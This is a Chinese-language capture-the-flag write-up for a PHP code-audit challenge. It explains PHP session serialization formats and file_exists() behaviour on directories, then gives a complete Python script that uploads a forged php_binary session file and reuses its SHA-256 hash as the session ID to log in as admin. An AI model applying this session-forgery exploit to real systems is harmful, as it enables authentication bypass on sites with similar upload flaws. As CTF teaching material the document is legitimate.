考点:通过上传session文件伪造session。
知识点1:
对于通过文件存储session的,不同的引擎存储方式有以下几种
php_binary:存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值
php:存储方式是,键名+竖线+经过serialize()函数序列处理的值
php_serialize(php>5.5.4):存储方式是,经过serialize()函数序列化处理的值
知识点2:
file_exists() :检查文件或目录是香存在
当传入的路径为目录时函数返回值也为True
做题:
一道代码审计题
满足以下两个条件即可得到flag:
1.$_session['username'] === 'admin'
2.存在/var/babyctf/success.txt文件或者目录
这里有一个上传文件的功能,过滤了文件存储路径中的../和..\\,应该是防止目录穿越的,不过跟解题没有关系。 上传后的文件名在末尾加上了文件内容的哈希值,这个文件重命名也没什么用,我们可以自己计算哈希,并不影响我们知道重命名后的文件名。因此这段代码的功能就是可以在var/babyctf/下传任意文件。
这里是一个普通的读取文件的功能,可以读取var/babyctf/下任意文件。
解题思路:
1.利用文件读取功能读取session文件,判断session的存储方式。
session文件的默认文件名为sess+sessin_id
可以判断是通过php_binary方式存储,因此后面构造session也要以php_binary方式。
2.生成session文件并上传。
3.任意上传一个文件到/var/babyctf/success.txt/,目的是为了创建success.txt目录,依次通过file_exists的判断。
4.通过session_id再次访问页面得到flag,session_id为我们上传的session文件被重命名后的文件名的下划线后面的部分,即session文件内容的sha256哈希摘要。
直接给出flag获取脚本:
import hashlib
from io import BytesIO
import requests
url = 'http://5acc7c53-8abb-48ad-a93b-f529caffa7de.node4.buuoj.cn:81/index.php'
# 第一步:上传伪造的session文件
files = {"up_file": ("sess", BytesIO('\x08usernames:5:"admin";'.encode('utf-8')))}
data = {
'direction':'upload',
'attr':''
}
res = requests.post(url, data=data ,files=files)
# 第二步:获取后面请求时的session_id
session_id = hashlib.sha256('\x08usernames:5:"admin";'.encode('utf-8')).hexdigest()
# 第三步:在/var/babyctf/下创建success.txt目录
data1 = {
'attr': 'success.txt',
'direction': 'upload'
}
res1 = requests.post(url=url, data=data1, files=files)
# 第四步:通过上面获取的session_id发起请求,获取flag
cookie = {
'PHPSESSID':session_id
}
flag_res = requests.post(url,cookies = cookie)
print(flag_res.text)